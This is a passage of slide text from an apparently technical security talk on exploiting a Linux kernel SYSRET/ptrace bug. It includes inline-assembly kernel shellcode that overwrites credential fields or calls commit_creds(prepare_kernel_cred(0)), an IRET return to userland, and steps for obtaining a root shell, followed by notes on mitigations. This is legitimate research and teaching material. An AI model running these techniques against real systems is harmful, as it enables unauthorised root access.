  • 30. Kernel Shellcode ● %gs:0 will point to task_struct ● So we can simply: asm("movq %%gs:0, %0" : "=r"(ptr)); cred = (uint32_t *)ptr; for (i = 0; i < 1000; i++, cred++) { if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { cred[0] = cred[1] = cred[2] = cred[3] = 0; cred[4] = cred[5] = cred[6] = cred[7] = 0; ● Where uid/gid are getuid() and getdid() ● And our process will be root
  • 31. Kernel Shellcode ● On > 2.6.29 x8664_pda is removed ● And task_struct contains a new member called cred (credential records) ● If %rsp wasn’t modified we could walk back to top of stack to find thread_info ● And do heuristic scanning to find thread_info- >task_struct->creds->uid/gid ● However with credential records come two new functions ● prepare_kernel_cred / commit_creds
  • 32. Kernel Shellcode ● prepare_kernel_cred creates a new clean credentials structure ● commit_creds installs the new cred to the current task ● Both symbols are exported through /proc/kallsyms or /boot/System.map ● Kernel shellcode just needs to commit_creds(prepare_kernel_cred(0)); ● And we’re root again
  • 33. Kernel Shellcode ● Next we will have to cleanly return back to userland ● Easiest method is to use IRET: __asm__ __volatile__( "movq %0, 0x20(%%rsp);" "movq %1, 0x18(%%rsp);" "movq %2, 0x10(%%rsp);" "movq %3, 0x08(%%rsp);" "movq %4, 0x00(%%rsp);" "swapgs;" "iretq;" :: "i"(USER_SS), "i"(user_stack), "i"(USER_FL), "i"(USER_CS), "i"(user_code) ); ● Where user_code points to memory in userland that should be executed when kernel exits
  • 34. Popping uid=0(root) ● user_code can do anything now since it runs as root ● So we can simply execve(/bin/sh) from there ● However that happens inside the child so we have to bring the rootshell back to the parent ● Or we just chmod() or setxattr() to drop a root-shell
  • 36. Liminations ● These techniques work well with 2.6.18 - 3.9.X 3.10 mitigates the IDT attack by remapping it to rodata (arch/x86/kernel/traps.c) __set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); idt_descr.address = fix_to_virt(FIX_RO_IDT); ● CPUs with SMAP/SMEP will detect accessing userland code while still being in ring0 ● Grsecurity will provide handful of protections to make this bug a pain to exploit ○ GRKERNSEC_RANDSTRUCT ○ PAX_MEMORY_UDEREF ○ GRKERNSEC_HIDESYM ○ ...
  • 37. Further thoughts ● Linux fix is weird (“only” forces ptrace_stop() to use IRET) ● Syscalls can still return via SYSRET ● Also bug within SYSRET is still present ● Since it’s a hardware issue it might be present in other OSes in different variations (OHAI 2006) ● Any1 wanna check FreeBSD …?